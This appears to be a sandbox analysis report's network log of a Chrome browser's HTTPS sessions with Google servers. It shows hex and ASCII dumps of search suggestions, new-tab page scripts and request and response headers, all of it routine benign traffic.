                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC1390INData Raw: 69 6e 74 65 72 20 73 74 6f 72 6d 20 6e 61 73 68 76 69 6c 6c 65 20 74 6e 22 2c 22 77 69 6c 6c 20 74 72 65 6e 74 20 73 65 61 73 6f 6e 20 33 22 2c 22 6d 65 67 61 20 6d 69 6c 6c 69 6f 6e 73 20 6a 61 63 6b 70 6f 74 20 6c 6f 74 74 65 72 79 20 6e 75 6d 62 65 72 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22
                                                                                                                                                                                                                                    Data Ascii: inter storm nashville tn","will trent season 3","mega millions jackpot lottery numbers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"
                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC789INData Raw: 58 53 55 56 45 54 79 74 6d 55 33 6c 5a 59 6a 68 79 63 32 30 33 5a 56 5a 4a 53 7a 4e 43 59 57 5a 6f 51 58 42 55 55 44 6b 78 55 45 38 76 63 30 78 69 64 31 70 73 4e 6d 5a 73 55 30 68 44 4e 30 35 53 51 30 63 32 55 7a 4a 46 52 6e 63 79 55 30 5a 69 62 46 6c 74 4e 6b 74 47 54 6c 70 73 4d 6b 6c 79 51 6d 52 73 56 6b 6c 4b 57 6a 64 32 61 30 68 61 65 55 67 76 54 31 46 50 52 44 59 35 4d 32 4e 68 56 6b 78 70 4f 55 4e 33 54 30 4a 36 53 55 35 69 64 45 39 73 4d 46 5a 48 56 32 6c 4b 64 47 6c 51 64 6e 6c 56 5a 30 74 69 56 79 74 4a 65 55 4d 30 54 48 45 32 55 45 4a 33 56 44 5a 57 54 79 39 75 64 32 5a 74 4e 6a 64 34 54 6b 35 61 63 45 5a 49 4d 31 64 48 51 31 68 45 53 6c 52 46 65 6d 55 79 61 44 6c 4f 53 46 4a 32 4e 58 68 6d 5a 30 31 42 64 48 70 46 63 6e 52 58 53 56 68 4b 51 55
                                                                                                                                                                                                                                    Data Ascii: XSUVETytmU3lZYjhyc203ZVZJSzNCYWZoQXBUUDkxUE8vc0xid1psNmZsU0hDN05SQ0c2UzJFRncyU0ZibFltNktGTlpsMklyQmRsVklKWjd2a0haeUgvT1FPRDY5M2NhVkxpOUN3T0J6SU5idE9sMFZHV2lKdGlQdnlVZ0tiVytJeUM0THE2UEJ3VDZWTy9ud2ZtNjd4Tk5acEZIM1dHQ1hESlRFemUyaDlOSFJ2NXhmZ01BdHpFcnRXSVhKQU
                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    9192.168.2.449750142.250.185.1004437064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:41 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Version: 712799076
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:42 GMT
                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC372INData Raw: 32 31 30 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                    Data Ascii: 2104)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                    Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                    Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                    Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                    Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 37 33 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77
                                                                                                                                                                                                                                    Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700273,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1138INData Raw: 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4b 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4c 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4d 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73
                                                                                                                                                                                                                                    Data Ascii: Array(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Kd\u003dfunction(a){return new _.Jd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Ld\u003dglobalThis.trustedTypes;_.Md\u003dclass{constructor(a){this
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC502INData Raw: 31 65 66 0d 0a 52 4c 3a 62 7d 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 57 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 56 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 56 64 5c 75 30 30 33 64 55 64 28 29 29 3b 72 65 74 75 72 6e 20 56 64 7d 3b 5c 6e 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 57 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 58 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 58 64 29 72 65 74 75 72 6e 20 61
                                                                                                                                                                                                                                    Data Ascii: 1efRL:b})}catch(b){}return a};_.Wd\u003dfunction(){Vd\u003d\u003d\u003dvoid 0\u0026\u0026(Vd\u003dUd());return Vd};\n_.Yd\u003dfunction(a){const b\u003d_.Wd();return new _.Xd(b?b.createScriptURL(a):a)};_.Zd\u003dfunction(a){if(a instanceof _.Xd)return a
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 38 30 30 30 0d 0a 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 52 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30
                                                                                                                                                                                                                                    Data Ascii: 8000b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.de\u003dfunction(a){var b\u003d_.Ra(a);return b\u003d\u00
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC1390INData Raw: 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e 63 6c 61 73 73 4e 61 6d 65 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6e 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6e 65 5b 64 5d 2c 63 29 3a 5f 2e 69 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 69 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6e 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65
                                                                                                                                                                                                                                    Data Ascii: 03dc:d\u003d\u003d\"class\"?a.className\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:ne.hasOwnProperty(d)?a.setAttribute(ne[d],c):_.ie(d,\"aria-\")||_.ie(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};ne\u003d{cellpadding:\"cellPadding\",cellspacing:\"ce


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    10192.168.2.449751142.250.185.1004437064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Version: 712799076
                                                                                                                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:42 GMT
                                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                    2025-01-09 13:01:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    11192.168.2.449760142.250.186.464437064C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC733OUTGET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1
                                                                                                                                                                                                                                    Host: apis.google.com
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX
                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    2025-01-09 13:01:45 UTC914INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access
                                                                                                                                                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access"
                                                                                                                                                                                                                                    Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]}
                                                                                                                                                                                                                                    Content-Length: 117446
                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                    Server: sffe
                                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 11:25:13 GMT
                                                                                                                                                                                                                                    Expires: Fri, 09 Jan 2026 11:25:13 GMT
                                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                    Last-Modified: Wed, 08 Jan 2025 15:23:05 GMT
                                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Age: 5792
                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                    Connection: close
